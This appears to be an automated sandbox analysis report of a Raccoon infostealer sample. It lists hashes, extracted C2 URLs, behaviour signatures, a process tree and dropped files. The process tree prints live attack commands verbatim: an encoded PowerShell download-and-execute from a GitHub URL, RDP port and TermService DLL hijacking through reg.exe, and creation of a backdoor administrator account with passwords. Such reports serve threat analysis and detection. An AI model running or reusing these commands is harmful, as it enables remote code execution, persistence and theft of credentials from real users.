Analysis
-
max time kernel
78s -
max time network
132s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
03-06-2021 13:06
General
-
Target
66ee84542266e55c0215ca60869f1347.exe
-
Size
567KB
-
MD5
66ee84542266e55c0215ca60869f1347
-
SHA1
147b6dd6bd7b0c5060ded97b844bb1494cf1ddb6
-
SHA256
143cf1724057f9b6a6630656e8735857d6146ff6dd0c2afc736545b46194437c
-
SHA512
ead9fc39d6fc972587b777151b040885b7df8eb4ea2bf305f259243915ef2bd190c9e4ea36999442b59b52054a75f07df9d8dd3f380841bb27a13c587b6da2ad
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
89ac909b803bacbc6cc523520599c4b9c029b033
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe"C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmp" "c:\Users\Admin\AppData\Local\Temp\2n50zo5s\CSC396F2BCDAA27415EA11A9BA7FDC1FD5.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 27WEG86E /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc 27WEG86E /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 27WEG86E /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 27WEG86E1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 27WEG86E2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 27WEG86E3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.dllMD5
6b45c158c0142e7fe26e9517bc853a31
SHA1e84441f6a39c7688b165efea73b14c7320fff13c
SHA2568298870da40cba6b86f30c392404ce3404c32c36da37ebe3e808ba642bd2dc8c
SHA512882c2e1a54595041aa432d20be1cfd1d709e4c2ce10da22d9d535f21bba2348bdba3aba9fc2bfa523279d3c5ac1d2c7a07840ac0765682c6e83b051e1ddb4a03
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
b2207567c6a62b42655772770ce2a4e6
SHA151074ad655105f0c496f4017e8afee90d9cab900
SHA256d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab
SHA51285d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5
-
C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmpMD5
4546e1b20ae249b3b97789431845df7d
SHA181322443c226336c15f848a70f1df1ad0ce36bb7
SHA256679f66b63e7edcaddc00c7fc1289f2daa103b60652ea90ba0fa6191f3af40017
SHA512a55cea99aa0eab5f443a79737c7714df821e76e124648c022275f94bd179d757176cdd7b7c09be08d31fab18d46bd01217d1f28575c1cf25b11a4f4387f753b5
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exeMD5
aa80d5960e65ac46ad446c09c1a17608
SHA1c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA51207e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exeMD5
aa80d5960e65ac46ad446c09c1a17608
SHA1c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA51207e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.cmdlineMD5
0e81c1db6e6d18e3eb0a90640a848561
SHA10a1f8fd66cf98523b54e82aba40628893aed243e
SHA256c95467ba12392c4878f251b40d1296754bcee72c7193929a1cc3aca1f9b1c64c
SHA512f2f0bc3f8235ab8d1727e96526f973e367fe664c45b565c421e1419bab82c8781a013ea095f8c760de284dc27e5a9331c8740a1fe575a155eb81d6318e089f29
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\CSC396F2BCDAA27415EA11A9BA7FDC1FD5.TMPMD5
243aa15a7018198b56d08105b12f765b
SHA1eae0e27cd3844b8502f5133367a134d6c1c46368
SHA256e05187476e3cf9806ea918fed9595a229ee0d03f5472fc3c8d3f3a8cab33a95e
SHA5124ceb831ec76876a8a1adb5cc0887278f7ba018869755852e364b2246376340ea57302bf550894b9d12b7289d8ec710a0b3cc6b1d652f5166c7f3f8f314612053
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
1da8e368cb917044f7440a54d79f6737
SHA1df60dd7011bc948f3b871b1a6cb149a7028c1a85
SHA256dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4
SHA5128437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92
-
\Windows\Branding\mediasvc.pngMD5
009e8b6a916836a4a8aa2be3229276a1
SHA128f3892fb8b63e7299dce25cb65bf252e29d5afd
SHA25639ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7
SHA512a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc
-
memory/212-250-0x0000000000000000-mapping.dmp
-
memory/212-231-0x0000000000000000-mapping.dmp
-
memory/996-151-0x0000000000000000-mapping.dmp
-
memory/1244-217-0x0000000000000000-mapping.dmp
-
memory/1244-219-0x0000020A7F730000-0x0000020A7F732000-memory.dmpFilesize
8KB
-
memory/1244-221-0x0000020A7F736000-0x0000020A7F738000-memory.dmpFilesize
8KB
-
memory/1244-220-0x0000020A7F733000-0x0000020A7F735000-memory.dmpFilesize
8KB
-
memory/1244-222-0x0000020A7F738000-0x0000020A7F73A000-memory.dmpFilesize
8KB
-
memory/1284-155-0x0000000000000000-mapping.dmp
-
memory/1324-243-0x0000000000000000-mapping.dmp
-
memory/1384-213-0x00000203331C8000-0x00000203331CA000-memory.dmpFilesize
8KB
-
memory/1384-203-0x00000203331C6000-0x00000203331C8000-memory.dmpFilesize
8KB
-
memory/1384-181-0x00000203331C3000-0x00000203331C5000-memory.dmpFilesize
8KB
-
memory/1384-180-0x00000203331C0000-0x00000203331C2000-memory.dmpFilesize
8KB
-
memory/1384-173-0x0000000000000000-mapping.dmp
-
memory/1524-262-0x0000000000000000-mapping.dmp
-
memory/1528-225-0x0000000000000000-mapping.dmp
-
memory/1612-228-0x0000000000000000-mapping.dmp
-
memory/1720-126-0x00000241EF9E0000-0x00000241EFE01000-memory.dmpFilesize
4.1MB
-
memory/1720-131-0x00000241EF5A5000-0x00000241EF5A6000-memory.dmpFilesize
4KB
-
memory/1720-130-0x00000241EF5A3000-0x00000241EF5A5000-memory.dmpFilesize
8KB
-
memory/1720-129-0x00000241EF5A0000-0x00000241EF5A2000-memory.dmpFilesize
8KB
-
memory/1720-122-0x0000000000000000-mapping.dmp
-
memory/1720-132-0x00000241EF5A6000-0x00000241EF5A7000-memory.dmpFilesize
4KB
-
memory/1908-245-0x0000000000000000-mapping.dmp
-
memory/1928-230-0x0000000000000000-mapping.dmp
-
memory/2124-258-0x000002C979378000-0x000002C979379000-memory.dmpFilesize
4KB
-
memory/2124-242-0x0000000000000000-mapping.dmp
-
memory/2124-254-0x0000000000000000-mapping.dmp
-
memory/2124-257-0x000002C979376000-0x000002C979378000-memory.dmpFilesize
8KB
-
memory/2124-256-0x000002C979373000-0x000002C979375000-memory.dmpFilesize
8KB
-
memory/2124-255-0x000002C979370000-0x000002C979372000-memory.dmpFilesize
8KB
-
memory/2220-260-0x0000000000000000-mapping.dmp
-
memory/2240-248-0x0000000000000000-mapping.dmp
-
memory/2480-239-0x0000000000000000-mapping.dmp
-
memory/2496-127-0x0000000000000000-mapping.dmp
-
memory/2496-251-0x0000000000000000-mapping.dmp
-
memory/2648-241-0x0000000000000000-mapping.dmp
-
memory/2660-261-0x0000000000000000-mapping.dmp
-
memory/2688-141-0x0000024E712F3000-0x0000024E712F5000-memory.dmpFilesize
8KB
-
memory/2688-223-0x0000024E712F8000-0x0000024E712F9000-memory.dmpFilesize
4KB
-
memory/2688-159-0x0000024E71240000-0x0000024E71241000-memory.dmpFilesize
4KB
-
memory/2688-166-0x0000024E72CC0000-0x0000024E72CC1000-memory.dmpFilesize
4KB
-
memory/2688-154-0x0000024E712F6000-0x0000024E712F8000-memory.dmpFilesize
8KB
-
memory/2688-133-0x0000000000000000-mapping.dmp
-
memory/2688-165-0x0000024E72930000-0x0000024E72931000-memory.dmpFilesize
4KB
-
memory/2688-143-0x0000024E71580000-0x0000024E71581000-memory.dmpFilesize
4KB
-
memory/2688-139-0x0000024E712F0000-0x0000024E712F2000-memory.dmpFilesize
8KB
-
memory/2688-138-0x0000024E71250000-0x0000024E71251000-memory.dmpFilesize
4KB
-
memory/2772-244-0x0000000000000000-mapping.dmp
-
memory/2776-235-0x0000000000000000-mapping.dmp
-
memory/2884-246-0x0000000000000000-mapping.dmp
-
memory/2988-114-0x0000000002230000-0x00000000022C1000-memory.dmpFilesize
580KB
-
memory/2988-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/3000-259-0x0000000000000000-mapping.dmp
-
memory/3028-229-0x0000000000000000-mapping.dmp
-
memory/3112-240-0x0000000000000000-mapping.dmp
-
memory/3112-226-0x0000000000000000-mapping.dmp
-
memory/3120-232-0x0000000000000000-mapping.dmp
-
memory/3324-236-0x0000000000000000-mapping.dmp
-
memory/3460-224-0x0000000000000000-mapping.dmp
-
memory/3580-253-0x0000000000000000-mapping.dmp
-
memory/3580-125-0x0000000000000000-mapping.dmp
-
memory/3648-249-0x0000000000000000-mapping.dmp
-
memory/3676-233-0x0000000000000000-mapping.dmp
-
memory/3752-247-0x0000000000000000-mapping.dmp
-
memory/3808-212-0x0000000000000000-mapping.dmp
-
memory/3808-214-0x000001C368290000-0x000001C368292000-memory.dmpFilesize
8KB
-
memory/3808-216-0x000001C368296000-0x000001C368298000-memory.dmpFilesize
8KB
-
memory/3808-215-0x000001C368293000-0x000001C368295000-memory.dmpFilesize
8KB
-
memory/3808-218-0x000001C368298000-0x000001C36829A000-memory.dmpFilesize
8KB
-
memory/3936-234-0x0000000000000000-mapping.dmp
-
memory/3948-227-0x0000000000000000-mapping.dmp
-
memory/3952-252-0x0000000000000000-mapping.dmp
